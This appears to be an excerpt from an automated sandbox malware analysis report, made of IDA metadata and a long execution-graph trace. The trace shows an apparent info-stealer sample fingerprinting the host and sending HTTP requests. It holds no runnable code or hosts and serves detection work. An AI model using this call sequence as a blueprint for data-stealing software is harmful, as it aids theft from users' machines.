                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: csm
                                                                                • API String ID: 3480331319-1018135373
                                                                                • Opcode ID: 3b9cc55e87b8581ae048873b394cc7bd4466d81de6814a092a28f20db301e082
                                                                                • Instruction ID: 2a3461a9d8f48132915c61cedf67c28efce82c989229d7b2527d18dfa360473d
                                                                                • Opcode Fuzzy Hash: 3b9cc55e87b8581ae048873b394cc7bd4466d81de6814a092a28f20db301e082
                                                                                • Instruction Fuzzy Hash: 98419034A002089FCF10DF6CC885ADE7BBDBF46314F148156E914AB293DB39EA11CB90
                                                                                APIs
                                                                                • EncodePointer.KERNEL32(00000000,?), ref: 00AB9572
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1950754794.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1950696575.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950810222.0000000000ACE000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000AD8000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1950868153.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1951046873.0000000000B0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodePointer
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2118026453-2084237596
                                                                                • Opcode ID: a8923ca70430833b637216cc4d1d4a83ebdde39555a06e8fea07488d5ae1a33c
                                                                                • Instruction ID: 5fe96228def165c42b10ef968770b0a621bd8b67ae79c2362acb0a0c3888a261
                                                                                • Opcode Fuzzy Hash: a8923ca70430833b637216cc4d1d4a83ebdde39555a06e8fea07488d5ae1a33c
                                                                                • Instruction Fuzzy Hash: 44412871900209AFCF16DF98CD81EEEBBB9BF48304F194199FA05A7262D3399A50DB50

                                                                                Execution Graph

                                                                                Execution Coverage:5.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:11.9%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:39
API calls 69200->69201 69202 403255 69201->69202 69203 4024d7 9 API calls 69202->69203 69204 403266 69203->69204 69205 4024d7 9 API calls 69204->69205 69206 403277 69205->69206 69207 4024d7 9 API calls 69206->69207 69208 403288 69207->69208 69209 4024d7 9 API calls 69208->69209 69210 403299 69209->69210 69211 4024d7 9 API calls 69210->69211 69212 4032aa 69211->69212 69213 4024d7 9 API calls 69212->69213 69214 4032bb 69213->69214 69215 4024d7 9 API calls 69214->69215 69216 4032cc 69215->69216 69217 4024d7 9 API calls 69216->69217 69218 4032dd 69217->69218 69219 4024d7 9 API calls 69218->69219 69220 4032ee 69219->69220 69221 4024d7 9 API calls 69220->69221 69222 4032ff 69221->69222 69223 4024d7 9 API calls 69222->69223 69224 403310 69223->69224 69225 4024d7 9 API calls 69224->69225 69226 403321 69225->69226 69227 4024d7 9 API calls 69226->69227 69228 403332 69227->69228 69229 4024d7 9 API calls 69228->69229 69230 403343 69229->69230 69231 4024d7 9 API calls 69230->69231 69232 403354 69231->69232 69233 4024d7 9 API calls 69232->69233 69234 403365 69233->69234 69235 4024d7 9 API calls 69234->69235 69236 403376 69235->69236 69237 4024d7 9 API calls 69236->69237 69238 403387 69237->69238 69239 4024d7 9 API calls 69238->69239 69240 403398 69239->69240 69241 4024d7 9 API calls 69240->69241 69242 4033a9 69241->69242 69243 4024d7 9 API calls 69242->69243 69244 4033ba 69243->69244 69245 4024d7 9 API calls 69244->69245 69246 4033cb 69245->69246 69247 4024d7 9 API calls 69246->69247 69248 4033dc 69247->69248 69249 4024d7 9 API calls 69248->69249 69250 4033ed 69249->69250 69251 4024d7 9 API calls 69250->69251 69252 4033fe 69251->69252 69253 4024d7 9 API calls 69252->69253 69254 40340f 69253->69254 69255 4024d7 9 API calls 69254->69255 69256 403420 69255->69256 69257 4024d7 9 API calls 69256->69257 69258 403431 69257->69258 69259 4024d7 9 API calls 69258->69259 69260 403442 69259->69260 69261 4024d7 9 API calls 69260->69261 69262 403453 69261->69262 69263 4024d7 9 API calls 
69262->69263 69264 403464 69263->69264 69265 4024d7 9 API calls 69264->69265 69266 403475 69265->69266 69267 4024d7 9 API calls 69266->69267 69268 403486 69267->69268 69269 4024d7 9 API calls 69268->69269 69270 403497 69269->69270 69271 4024d7 9 API calls 69270->69271 69272 4034a8 69271->69272 69273 4024d7 9 API calls 69272->69273 69274 4034b9 69273->69274 69275 4024d7 9 API calls 69274->69275 69276 4034ca 69275->69276 69277 4024d7 9 API calls 69276->69277 69278 4034db 69277->69278 69279 4024d7 9 API calls 69278->69279 69280 4034ec 69279->69280 69281 4024d7 9 API calls 69280->69281 69282 4034fd 69281->69282 69283 4024d7 9 API calls 69282->69283 69284 40350e 69283->69284 69285 4024d7 9 API calls 69284->69285 69286 40351f 69285->69286 69287 4024d7 9 API calls 69286->69287 69288 403530 69287->69288 69289 4024d7 9 API calls 69288->69289 69290 403541 69289->69290 69291 4024d7 9 API calls 69290->69291 69292 403552 69291->69292 69293 4024d7 9 API calls 69292->69293 69294 403563 69293->69294 69295 4024d7 9 API calls 69294->69295 69296 403574 69295->69296 69297 4024d7 9 API calls 69296->69297 69298 403585 69297->69298 69299 4024d7 9 API calls 69298->69299 69300 403596 69299->69300 69301 4024d7 9 API calls 69300->69301 69302 4035a7 69301->69302 69303 4024d7 9 API calls 69302->69303 69304 4035b8 69303->69304 69305 4024d7 9 API calls 69304->69305 69306 4035c9 69305->69306 69307 4024d7 9 API calls 69306->69307 69308 4035da 69307->69308 69309 4024d7 9 API calls 69308->69309 69310 4035eb 69309->69310 69311 4024d7 9 API calls 69310->69311 69312 4035fc 69311->69312 69313 4024d7 9 API calls 69312->69313 69314 40360d 69313->69314 69315 4024d7 9 API calls 69314->69315 69316 40361e 69315->69316 69317 4024d7 9 API calls 69316->69317 69318 40362f 69317->69318 69319 4024d7 9 API calls 69318->69319 69320 403640 69319->69320 69321 4024d7 9 API calls 69320->69321 69322 403651 69321->69322 69323 4024d7 9 API calls 69322->69323 69324 403662 69323->69324 69325 4024d7 9 API calls 69324->69325 
69326 403673 69325->69326 69327 4024d7 9 API calls 69326->69327 69328 403684 69327->69328 69329 4024d7 9 API calls 69328->69329 69330 403695 69329->69330 69331 4024d7 9 API calls 69330->69331 69332 4036a6 69331->69332 69333 4024d7 9 API calls 69332->69333 69334 4036b7 69333->69334 69335 4024d7 9 API calls 69334->69335 69336 4036c8 69335->69336 69337 4024d7 9 API calls 69336->69337 69338 4036d9 69337->69338 69339 4024d7 9 API calls 69338->69339 69340 4036ea 69339->69340 69341 4024d7 9 API calls 69340->69341 69342 4036fb 69341->69342 69343 4024d7 9 API calls 69342->69343 69344 40370c 69343->69344 69345 4024d7 9 API calls 69344->69345 69346 40371d 69345->69346 69347 4024d7 9 API calls 69346->69347 69348 40372e 69347->69348 69349 4024d7 9 API calls 69348->69349 69350 40373f 69349->69350 69351 4024d7 9 API calls 69350->69351 69352 403750 69351->69352 69353 4024d7 9 API calls 69352->69353 69354 403761 69353->69354 69355 4024d7 9 API calls 69354->69355 69356 403772 69355->69356 69357 4024d7 9 API calls 69356->69357 69358 403783 69357->69358 69359 4024d7 9 API calls 69358->69359 69360 403794 69359->69360 69361 4024d7 9 API calls 69360->69361 69362 4037a5 69361->69362 69363 4024d7 9 API calls 69362->69363 69364 4037b6 69363->69364 69365 4024d7 9 API calls 69364->69365 69366 4037c7 69365->69366 69367 4024d7 9 API calls 69366->69367 69368 4037d8 69367->69368 69369 4024d7 9 API calls 69368->69369 69370 4037e9 69369->69370 69371 4024d7 9 API calls 69370->69371 69372 4037fa 69371->69372 69373 4024d7 9 API calls 69372->69373 69374 40380b 69373->69374 69375 4024d7 9 API calls 69374->69375 69376 40381c 69375->69376 69377 4024d7 9 API calls 69376->69377 69378 40382d 69377->69378 69379 4024d7 9 API calls 69378->69379 69380 40383e 69379->69380 69381 4024d7 9 API calls 69380->69381 69382 40384f 69381->69382 69383 4024d7 9 API calls 69382->69383 69384 403860 69383->69384 69385 4024d7 9 API calls 69384->69385 69386 403871 69385->69386 69387 4024d7 9 API calls 69386->69387 69388 403882 
69387->69388 69389 4024d7 9 API calls 69388->69389 69390 403893 69389->69390 69391 4024d7 9 API calls 69390->69391 69392 4038a4 69391->69392 69393 4024d7 9 API calls 69392->69393 69394 4038b5 69393->69394 69395 4024d7 9 API calls 69394->69395 69396 4038c6 69395->69396 69397 4024d7 9 API calls 69396->69397 69398 4038d7 69397->69398 69399 4024d7 9 API calls 69398->69399 69400 4038e8 69399->69400 69401 4024d7 9 API calls 69400->69401 69402 4038f9 69401->69402 69403 4024d7 9 API calls 69402->69403 69404 40390a 69403->69404 69405 4024d7 9 API calls 69404->69405 69406 40391b 69405->69406 69407 4024d7 9 API calls 69406->69407 69408 40392c 69407->69408 69409 4024d7 9 API calls 69408->69409 69410 40393d 69409->69410 69411 4024d7 9 API calls 69410->69411 69412 40394e 69411->69412 69413 4024d7 9 API calls 69412->69413 69414 40395f 69413->69414 69415 4024d7 9 API calls 69414->69415 69416 403970 69415->69416 69417 4024d7 9 API calls 69416->69417 69418 403981 69417->69418 69419 4024d7 9 API calls 69418->69419 69420 403992 69419->69420 69421 4024d7 9 API calls 69420->69421 69422 4039a3 69421->69422 69423 4024d7 9 API calls 69422->69423 69424 4039b4 69423->69424 69425 4024d7 9 API calls 69424->69425 69426 4039c5 69425->69426 69427 4024d7 9 API calls 69426->69427 69428 4039d6 69427->69428 69429 4024d7 9 API calls 69428->69429 69430 4039e7 69429->69430 69431 4024d7 9 API calls 69430->69431 69432 4039f8 69431->69432 69433 4024d7 9 API calls 69432->69433 69434 403a09 69433->69434 69435 4024d7 9 API calls 69434->69435 69436 403a1a 69435->69436 69437 4024d7 9 API calls 69436->69437 69438 403a2b 69437->69438 69439 4024d7 9 API calls 69438->69439 69440 403a3c 69439->69440 69441 4024d7 9 API calls 69440->69441 69442 403a4d 69441->69442 69443 417645 69442->69443 69444 417652 43 API calls 69443->69444 69445 417a2a 9 API calls 69443->69445 69444->69445 69446 417b39 69445->69446 69447 417acb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69445->69447 69448 417b46 8 
API calls 69446->69448 69449 417bf9 69446->69449 69447->69446 69448->69449 69450 417c70 69449->69450 69451 417c02 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69449->69451 69452 417d02 69450->69452 69453 417c7d 6 API calls 69450->69453 69451->69450 69454 417dd9 69452->69454 69455 417d0f 9 API calls 69452->69455 69453->69452 69456 417e50 69454->69456 69457 417de2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69454->69457 69455->69454 69458 417e82 69456->69458 69459 417e59 GetProcAddress GetProcAddress 69456->69459 69457->69456 69460 417eb4 69458->69460 69461 417e8b GetProcAddress GetProcAddress 69458->69461 69459->69458 69462 417ec1 10 API calls 69460->69462 69463 417fa0 69460->69463 69461->69460 69462->69463 69464 418000 69463->69464 69465 417fa9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69463->69465 69466 418009 GetProcAddress 69464->69466 69467 41801b 69464->69467 69465->69464 69466->69467 69468 418024 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 69467->69468 69469 41807b 69467->69469 69468->69469 69470 416aac 69469->69470 69471 418084 GetProcAddress 69469->69471 69472 410b5c _EH_prolog 69470->69472 69471->69470 69473 40f923 lstrcpy 69472->69473 69474 410b83 69473->69474 69475 40f923 lstrcpy 69474->69475 69476 410b9a GetSystemTime 69475->69476 69477 410bb8 69476->69477 69477->68685 69480 40fa65 69478->69480 69479 40fa89 69479->68694 69480->69479 69481 40fa77 lstrcpy lstrcat 69480->69481 69481->69479 69483 40f95a lstrcpy 69482->69483 69484 4010cc 69483->69484 69485 40f95a lstrcpy 69484->69485 69486 4010dc 69485->69486 69487 40f95a lstrcpy 69486->69487 69488 4010ec 69487->69488 69489 40f95a lstrcpy 69488->69489 69490 401108 69489->69490 69491 41390c _EH_prolog 69490->69491 69492 4135ac _EH_prolog 69491->69492 69493 413932 69492->69493 69494 40f997 2 API calls 69493->69494 69495 413946 69494->69495 69496 40f997 2 API calls 69495->69496 69497 413953 69496->69497 69498 40f997 2 
API calls 69497->69498 69499 413960 69498->69499 69500 40f923 lstrcpy 69499->69500 69501 413970 69500->69501 69502 40f923 lstrcpy 69501->69502 69503 413981 69502->69503 69504 40f923 lstrcpy 69503->69504 69505 413992 69504->69505 69506 40f923 lstrcpy 69505->69506 69507 4139a3 69506->69507 69508 40f923 lstrcpy 69507->69508 69509 4139b4 69508->69509 69510 40f923 lstrcpy 69509->69510 69595 4139c5 69510->69595 69511 4020f9 lstrcpy 69511->69595 69513 40212d lstrcpy 69513->69595 69514 413adc StrCmpCA 69514->69595 69515 413b5d StrCmpCA 69516 41435b 69515->69516 69515->69595 69517 40f9e1 lstrcpy 69516->69517 69518 41436a 69517->69518 70628 40212d 69518->70628 69521 40f9e1 lstrcpy 69523 414381 69521->69523 69522 413d0a StrCmpCA 69524 414316 69522->69524 69522->69595 70631 402286 lstrcpy 69523->70631 69525 40f9e1 lstrcpy 69524->69525 69527 414325 69525->69527 69526 402147 lstrcpy 69526->69595 70626 40217b lstrcpy 69527->70626 69531 41432e 69533 40f9e1 lstrcpy 69531->69533 69532 414396 69534 40f9e1 lstrcpy 69532->69534 69537 41433c 69533->69537 69538 4143a4 69534->69538 69535 413eb7 StrCmpCA 69536 4142d1 69535->69536 69535->69595 69540 40f9e1 lstrcpy 69536->69540 70627 4022a0 lstrcpy 69537->70627 70632 4132d9 lstrcpy _EH_prolog 69538->70632 69539 40217b lstrcpy 69539->69595 69541 4142e0 69540->69541 70624 4021c9 lstrcpy 69541->70624 69546 4142e9 69548 40f9e1 lstrcpy 69546->69548 69547 414064 StrCmpCA 69549 41428f 69547->69549 69547->69595 69554 4142f7 69548->69554 69551 40f9e1 lstrcpy 69549->69551 69550 40f9e1 lstrcpy 69552 41426f 69550->69552 69553 41429e 69551->69553 70621 4132d9 lstrcpy _EH_prolog 69552->70621 70622 402217 lstrcpy 69553->70622 70625 4022ba lstrcpy 69554->70625 69555 413c89 StrCmpCA 69555->69595 69558 402195 lstrcpy 69558->69595 69560 4142a7 69563 40f9e1 lstrcpy 69560->69563 69561 414261 69561->69550 69565 4142b5 69563->69565 69564 41420b StrCmpCA 69566 414226 69564->69566 69567 414216 Sleep 69564->69567 70623 4022d4 lstrcpy 69565->70623 69569 40f9e1 lstrcpy 
69566->69569 69567->69595 69568 402231 lstrcpy 69568->69595 69572 414235 69569->69572 69570 413118 33 API calls 69570->69595 69571 41428a 69581 413295 _EH_prolog 69571->69581 70619 402265 lstrcpy 69572->70619 69573 413e36 StrCmpCA 69573->69595 69577 4021e3 lstrcpy 69577->69595 69578 41423e 69580 40f9e1 lstrcpy 69578->69580 69579 4021c9 lstrcpy 69579->69595 69582 41424c 69580->69582 69584 41441b 69581->69584 70620 4022ee lstrcpy 69582->70620 69583 40f95a lstrcpy 69583->69595 70613 401061 _EH_prolog 69584->70613 69586 414427 69596 4136b3 69586->69596 69587 413fe3 StrCmpCA 69587->69595 69589 402217 lstrcpy 69589->69595 69590 41303a 28 API calls 69590->69595 69591 414190 StrCmpCA 69591->69595 69592 4010b1 _EH_prolog lstrcpy 69592->69595 69593 40f9e1 lstrcpy 69593->69595 69594 402265 lstrcpy 69594->69595 69595->69511 69595->69513 69595->69514 69595->69515 69595->69522 69595->69526 69595->69535 69595->69539 69595->69547 69595->69555 69595->69558 69595->69564 69595->69568 69595->69570 69595->69573 69595->69577 69595->69579 69595->69583 69595->69587 69595->69589 69595->69590 69595->69591 69595->69592 69595->69593 69595->69594 70610 402113 69595->70610 70615 402161 lstrcpy 69595->70615 70616 4021af lstrcpy 69595->70616 70617 4021fd lstrcpy 69595->70617 70618 40224b lstrcpy 69595->70618 69597 40f9e1 lstrcpy 69596->69597 69598 4136c3 69597->69598 69599 40f9e1 lstrcpy 69598->69599 69600 4136cf 69599->69600 69601 40f9e1 lstrcpy 69600->69601 69602 4136db 69601->69602 69603 413295 _EH_prolog 69602->69603 69604 4132b5 69603->69604 69604->68704 69606 40f971 69605->69606 69607 40f986 69606->69607 69608 40f97e lstrcpy 69606->69608 69607->68711 69608->69607 69609->68721 69611 410516 GetVolumeInformationA 69610->69611 69612 41050f 69610->69612 69613 410546 69611->69613 69612->69611 69614 410578 GetProcessHeap HeapAlloc 69613->69614 69615 41059b wsprintfA lstrcat 69614->69615 69616 41058d 69614->69616 70633 4104a2 GetCurrentHwProfileA 69615->70633 69617 40f923 lstrcpy 69616->69617 69619 
410596 69617->69619 69619->68728 69620 4105cb 69621 4105da lstrlenA 69620->69621 69622 4105ee 69621->69622 70637 411154 lstrcpy malloc strncpy 69622->70637 69624 4105f8 69625 410606 lstrcat 69624->69625 69626 410619 69625->69626 69627 40f923 lstrcpy 69626->69627 69628 41062a 69627->69628 69628->69619 69630 40f95a lstrcpy 69629->69630 69631 403b25 69630->69631 70638 403a54 _EH_prolog 69631->70638 69633 403b31 69634 40f923 lstrcpy 69633->69634 69635 403b4e 69634->69635 69636 40f923 lstrcpy 69635->69636 69637 403b61 69636->69637 69638 40f923 lstrcpy 69637->69638 69639 403b72 69638->69639 69640 40f923 lstrcpy 69639->69640 69641 403b83 69640->69641 69642 40f923 lstrcpy 69641->69642 69643 403b94 69642->69643 69644 403ba4 InternetOpenA StrCmpCA 69643->69644 69645 403bc6 69644->69645 69646 404122 InternetCloseHandle 69645->69646 69647 410b5c 3 API calls 69645->69647 69660 404136 69646->69660 69648 403bdc 69647->69648 69649 40fa28 3 API calls 69648->69649 69650 403bef 69649->69650 69651 40f9e1 lstrcpy 69650->69651 69652 403bfc 69651->69652 69653 40fa9c 4 API calls 69652->69653 69654 403c25 69653->69654 69655 40f9e1 lstrcpy 69654->69655 69656 403c32 69655->69656 69657 40fa9c 4 API calls 69656->69657 69658 403c4f 69657->69658 69659 40f9e1 lstrcpy 69658->69659 69661 403c5c 69659->69661 69660->68731 69662 40fa28 3 API calls 69661->69662 69663 403c78 69662->69663 69664 40f9e1 lstrcpy 69663->69664 69665 403c85 69664->69665 69666 40fa9c 4 API calls 69665->69666 69667 403ca2 69666->69667 69668 40f9e1 lstrcpy 69667->69668 69669 403caf 69668->69669 69670 40fa9c 4 API calls 69669->69670 69671 403ccc 69670->69671 69672 40f9e1 lstrcpy 69671->69672 69673 403cd9 69672->69673 69674 40fa9c 4 API calls 69673->69674 69675 403cf7 69674->69675 69676 40fa28 3 API calls 69675->69676 69677 403d0a 69676->69677 69678 40f9e1 lstrcpy 69677->69678 69679 403d17 69678->69679 69680 403d2f InternetConnectA 69679->69680 69680->69646 69681 403d55 HttpOpenRequestA 69680->69681 69682 404119 InternetCloseHandle 
69681->69682 69683 403d8e 69681->69683 69682->69646 69684 403d92 InternetSetOptionA 69683->69684 69685 403da8 69683->69685 69684->69685 69686 40fa9c 4 API calls 69685->69686 69687 403db9 69686->69687 69688 40f9e1 lstrcpy 69687->69688 69689 403dc6 69688->69689 69690 40fa28 3 API calls 69689->69690 69691 403de2 69690->69691 69692 40f9e1 lstrcpy 69691->69692 69693 403def 69692->69693 69694 40fa9c 4 API calls 69693->69694 69695 403e0c 69694->69695 69696 40f9e1 lstrcpy 69695->69696 69697 403e19 69696->69697 69698 40fa9c 4 API calls 69697->69698 69699 403e37 69698->69699 69700 40f9e1 lstrcpy 69699->69700 69701 403e44 69700->69701 69702 40fa9c 4 API calls 69701->69702 69703 403e61 69702->69703 69704 40f9e1 lstrcpy 69703->69704 69705 403e6e 69704->69705 69706 40fa9c 4 API calls 69705->69706 69707 403e8b 69706->69707 69708 40f9e1 lstrcpy 69707->69708 69709 403e98 69708->69709 69710 40fa28 3 API calls 69709->69710 69711 403eb4 69710->69711 69712 40f9e1 lstrcpy 69711->69712 69713 403ec1 69712->69713 69714 40fa9c 4 API calls 69713->69714 69715 403ede 69714->69715 69716 40f9e1 lstrcpy 69715->69716 69717 403eeb 69716->69717 69718 40fa9c 4 API calls 69717->69718 69719 403f08 69718->69719 69720 40f9e1 lstrcpy 69719->69720 69721 403f15 69720->69721 69722 40fa28 3 API calls 69721->69722 69723 403f31 69722->69723 69724 40f9e1 lstrcpy 69723->69724 69725 403f3e 69724->69725 69726 40fa9c 4 API calls 69725->69726 69727 403f5b 69726->69727 69728 40f9e1 lstrcpy 69727->69728 69729 403f68 69728->69729 69730 40fa9c 4 API calls 69729->69730 69731 403f86 69730->69731 69732 40f9e1 lstrcpy 69731->69732 69733 403f93 69732->69733 69734 40fa9c 4 API calls 69733->69734 69735 403fb0 69734->69735 69736 40f9e1 lstrcpy 69735->69736 69737 403fbd 69736->69737 69738 40fa9c 4 API calls 69737->69738 69739 403fda 69738->69739 69740 40f9e1 lstrcpy 69739->69740 69741 403fe7 69740->69741 69742 40fa28 3 API calls 69741->69742 69743 404003 69742->69743 69744 40f9e1 lstrcpy 69743->69744 69745 404010 69744->69745 
69746 40f923 lstrcpy 69745->69746 69747 404029 69746->69747 69748 40fa28 3 API calls 69747->69748 69749 40403d 69748->69749 69750 40fa28 3 API calls 69749->69750 69751 404050 69750->69751 69752 40f9e1 lstrcpy 69751->69752 69753 40405d 69752->69753 69754 40407d lstrlenA 69753->69754 69755 40408d 69754->69755 69756 404096 lstrlenA 69755->69756 70646 40fb4d 69756->70646 69758 4040a6 HttpSendRequestA 69759 4040ef InternetReadFile 69758->69759 69760 404106 InternetCloseHandle 69759->69760 69763 4040b5 69759->69763 70647 40f98e 69760->70647 69762 40fa9c 4 API calls 69762->69763 69763->69759 69763->69760 69763->69762 69764 40f9e1 lstrcpy 69763->69764 69764->69763 70651 40fb4d 69765->70651 69767 411cfe StrCmpCA 69768 411d10 69767->69768 69769 411d09 ExitProcess 69767->69769 69770 411d20 strtok_s 69768->69770 69771 411d31 69770->69771 69773 411e6d 69770->69773 69772 411e52 strtok_s 69771->69772 69774 411d81 StrCmpCA 69771->69774 69775 411df1 StrCmpCA 69771->69775 69776 411d65 StrCmpCA 69771->69776 69777 411dc7 StrCmpCA 69771->69777 69778 411e06 StrCmpCA 69771->69778 69779 411d49 StrCmpCA 69771->69779 69780 411d9d StrCmpCA 69771->69780 69781 411ddc StrCmpCA 69771->69781 69782 411e1c StrCmpCA 69771->69782 69783 411e3e StrCmpCA 69771->69783 69784 40f997 2 API calls 69771->69784 69772->69771 69772->69773 69773->68733 69774->69771 69774->69772 69775->69771 69775->69772 69776->69771 69776->69772 69777->69771 69777->69772 69778->69772 69779->69771 69779->69772 69780->69771 69780->69772 69781->69771 69781->69772 69782->69772 69783->69772 69784->69771 69786 40f95a lstrcpy 69785->69786 69787 40517c 69786->69787 69788 403a54 6 API calls 69787->69788 69789 405188 69788->69789 69790 40f923 lstrcpy 69789->69790 69791 4051a5 69790->69791 69792 40f923 lstrcpy 69791->69792 69793 4051b8 69792->69793 69794 40f923 lstrcpy 69793->69794 69795 4051c9 69794->69795 69796 40f923 lstrcpy 69795->69796 69797 4051da 69796->69797 69798 40f923 lstrcpy 69797->69798 69799 4051eb 69798->69799 69800 4051fb 
InternetOpenA StrCmpCA 69799->69800 69801 40521d 69800->69801 69802 4058d8 InternetCloseHandle 69801->69802 69803 410b5c 3 API calls 69801->69803 69804 4058f3 69802->69804 69805 405233 69803->69805 70658 406242 CryptStringToBinaryA 69804->70658 69807 40fa28 3 API calls 69805->69807 69809 405246 69807->69809 69810 40f9e1 lstrcpy 69809->69810 69815 405253 69810->69815 69811 40f997 2 API calls 69812 40590c 69811->69812 69813 40fa9c 4 API calls 69812->69813 69814 40591a 69813->69814 69816 40f9e1 lstrcpy 69814->69816 69817 40fa9c 4 API calls 69815->69817 69822 405926 69816->69822 69818 40527c 69817->69818 69819 40f9e1 lstrcpy 69818->69819 69820 405289 69819->69820 69821 40fa9c 4 API calls 69820->69821 69823 4052a6 69821->69823 69824 401061 _EH_prolog 69822->69824 69825 40f9e1 lstrcpy 69823->69825 69826 405984 69824->69826 69827 4052b3 69825->69827 69826->68739 69828 40fa28 3 API calls 69827->69828 69829 4052cf 69828->69829 69830 40f9e1 lstrcpy 69829->69830 69831 4052dc 69830->69831 69832 40fa9c 4 API calls 69831->69832 69833 4052f9 69832->69833 69834 40f9e1 lstrcpy 69833->69834 69835 405306 69834->69835 69836 40fa9c 4 API calls 69835->69836 69837 405323 69836->69837 69838 40f9e1 lstrcpy 69837->69838 69839 405330 69838->69839 69840 40fa9c 4 API calls 69839->69840 69841 40534e 69840->69841 69842 40fa28 3 API calls 69841->69842 69843 405361 69842->69843 69844 40f9e1 lstrcpy 69843->69844 69845 40536e 69844->69845 69846 405386 InternetConnectA 69845->69846 69846->69802 69847 4053ac HttpOpenRequestA 69846->69847 69848 4053e3 69847->69848 69849 4058cf InternetCloseHandle 69847->69849 69850 4053e7 InternetSetOptionA 69848->69850 69851 4053fd 69848->69851 69849->69802 69850->69851 69852 40fa9c 4 API calls 69851->69852 69853 40540e 69852->69853 69854 40f9e1 lstrcpy 69853->69854 69855 40541b 69854->69855 69856 40fa28 3 API calls 69855->69856 69857 405437 69856->69857 69858 40f9e1 lstrcpy 69857->69858 69859 405444 69858->69859 69860 40fa9c 4 API calls 69859->69860 69861 405461 
69860->69861 69862 40f9e1 lstrcpy 69861->69862 69863 40546e 69862->69863 69864 40fa9c 4 API calls 69863->69864 69865 40548c 69864->69865 69866 40f9e1 lstrcpy 69865->69866 69867 405499 69866->69867 69868 40fa9c 4 API calls 69867->69868 69869 4054b7 69868->69869 69870 40f9e1 lstrcpy 69869->69870 69871 4054c4 69870->69871 69872 40fa9c 4 API calls 69871->69872 69873 4054e1 69872->69873 69874 40f9e1 lstrcpy 69873->69874 69875 4054ee 69874->69875 69876 40fa28 3 API calls 69875->69876 69877 40550a 69876->69877 69878 40f9e1 lstrcpy 69877->69878 69879 405517 69878->69879 69880 40fa9c 4 API calls 69879->69880 69881 405534 69880->69881 69882 40f9e1 lstrcpy 69881->69882 69883 405541 69882->69883 69884 40fa9c 4 API calls 69883->69884 69885 40555e 69884->69885 69886 40f9e1 lstrcpy 69885->69886 69887 40556b 69886->69887 69888 40fa28 3 API calls 69887->69888 69889 405587 69888->69889 69890 40f9e1 lstrcpy 69889->69890 69891 405594 69890->69891 69892 40fa9c 4 API calls 69891->69892 69893 4055b1 69892->69893 69894 40f9e1 lstrcpy 69893->69894 69895 4055be 69894->69895 69896 40fa9c 4 API calls 69895->69896 69897 4055dc 69896->69897 69898 40f9e1 lstrcpy 69897->69898 69899 4055e9 69898->69899 69900 40fa9c 4 API calls 69899->69900 69901 405606 69900->69901 69902 40f9e1 lstrcpy 69901->69902 69903 405613 69902->69903 69904 40fa9c 4 API calls 69903->69904 69905 405630 69904->69905 69906 40f9e1 lstrcpy 69905->69906 69907 40563d 69906->69907 69908 40fa9c 4 API calls 69907->69908 69909 40565b 69908->69909 69910 40f9e1 lstrcpy 69909->69910 69911 405668 69910->69911 69912 40fa9c 4 API calls 69911->69912 69913 405685 69912->69913 69914 40f9e1 lstrcpy 69913->69914 69915 405692 69914->69915 69916 40fa9c 4 API calls 69915->69916 69917 4056af 69916->69917 69918 40f9e1 lstrcpy 69917->69918 69919 4056bc 69918->69919 69920 40fa28 3 API calls 69919->69920 69921 4056d8 69920->69921 69922 40f9e1 lstrcpy 69921->69922 69923 4056e5 69922->69923 69924 40fa9c 4 API calls 69923->69924 69925 405702 69924->69925 
69926 40f9e1 lstrcpy 69925->69926 69927 40570f 69926->69927 69928 40fa9c 4 API calls 69927->69928 69929 40572d 69928->69929 69930 40f9e1 lstrcpy 69929->69930 69931 40573a 69930->69931 69932 40fa9c 4 API calls 69931->69932 69933 405757 69932->69933 69934 40f9e1 lstrcpy 69933->69934 69935 405764 69934->69935 69936 40fa9c 4 API calls 69935->69936 69937 405781 69936->69937 69938 40f9e1 lstrcpy 69937->69938 69939 40578e 69938->69939 69940 40fa28 3 API calls 69939->69940 69941 4057aa 69940->69941 69942 40f9e1 lstrcpy 69941->69942 69943 4057b7 69942->69943 69944 4057cb lstrlenA 69943->69944 70652 40fb4d 69944->70652 69946 4057dc lstrlenA GetProcessHeap HeapAlloc 70653 40fb4d 69946->70653 69948 4057fe lstrlenA 70654 40fb4d 69948->70654 69950 40580e memcpy 70655 40fb4d 69950->70655 69952 405820 lstrlenA 69953 405830 69952->69953 69954 405839 lstrlenA memcpy 69953->69954 70656 40fb4d 69954->70656 69956 405855 lstrlenA 70657 40fb4d 69956->70657 69958 405865 HttpSendRequestA 69959 4058b1 InternetReadFile 69958->69959 69960 4058c8 InternetCloseHandle 69959->69960 69963 405877 69959->69963 69960->69849 69961 40fa9c 4 API calls 69961->69963 69962 40f9e1 lstrcpy 69962->69963 69963->69959 69963->69960 69963->69961 69963->69962 70663 40fb4d 69964->70663 69966 411740 strtok_s 69967 4117a9 69966->69967 69968 41174d 69966->69968 69967->68741 69969 411792 strtok_s 69968->69969 69970 40f997 2 API calls 69968->69970 69971 40f997 2 API calls 69968->69971 69969->69967 69969->69968 69970->69969 69971->69968 70664 40fb4d 69972->70664 69974 41151d strtok_s 69975 41162e 69974->69975 69976 41152e 69974->69976 69975->68749 69977 4115df StrCmpCA 69976->69977 69978 40f997 2 